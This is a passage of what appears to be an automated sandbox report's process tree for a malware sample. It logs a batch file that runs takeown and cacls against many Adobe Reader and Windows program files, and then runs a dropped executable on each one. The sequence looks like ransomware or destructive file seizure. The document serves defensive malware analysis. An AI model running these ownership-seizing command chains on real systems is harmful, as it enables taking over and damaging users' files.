    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:1184
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:1284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:916
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:204
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:1284
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1844
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1304
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:556
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:1072
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "directories.acrodata" -nobanner
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:664
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  PID:792
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:784
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      PID:996
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  PID:1176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    PID:1152
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
    3⤵
    PID:784
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDIALOG.exe.mui" -nobanner
      4⤵
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
    3⤵
    PID:220
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "jnwmon.dll.mui" -nobanner
      4⤵
      PID:1484
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1152
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:340
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "NBMapTIP.dll.mui" -nobanner
      4⤵
      PID:1956
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""
  2⤵
  PID:664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "PDIALOG.exe" -nobanner
    3⤵
    PID:564
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "PDIALOG.exe" -nobanner
      4⤵
      PID:1392
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:784
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Journal\Templates\Shorthand.jtp""
  2⤵
  PID:1064
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Shorthand.jtp" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Shorthand.jtp"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "Shorthand.jtp" -nobanner
    3⤵
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "Shorthand.jtp" -nobanner
      4⤵
      PID:1560
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui""
  2⤵
  PID:1152
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:684
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:1328
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2004
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1120
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1484
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:216
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1028
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1184
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:1328
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:364
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:1680
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"
    3⤵
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "CourierStd-Bold.otf" -nobanner
    3⤵
    PID:1284
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "CourierStd-Bold.otf" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"
    3⤵
    PID:792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "MyriadPro-It.otf" -nobanner
    3⤵
    PID:212
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "MyriadPro-It.otf" -nobanner
      4⤵
      PID:1328
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C
    3⤵
    PID:204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
      XK0Utxzv.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
      4⤵
      PID:336
- - C:\Users\Admin\AppData\Local\Temp\XK0Utxzv.exe
    XK0Utxzv.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\KjSdZGRy.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\cmd.exe
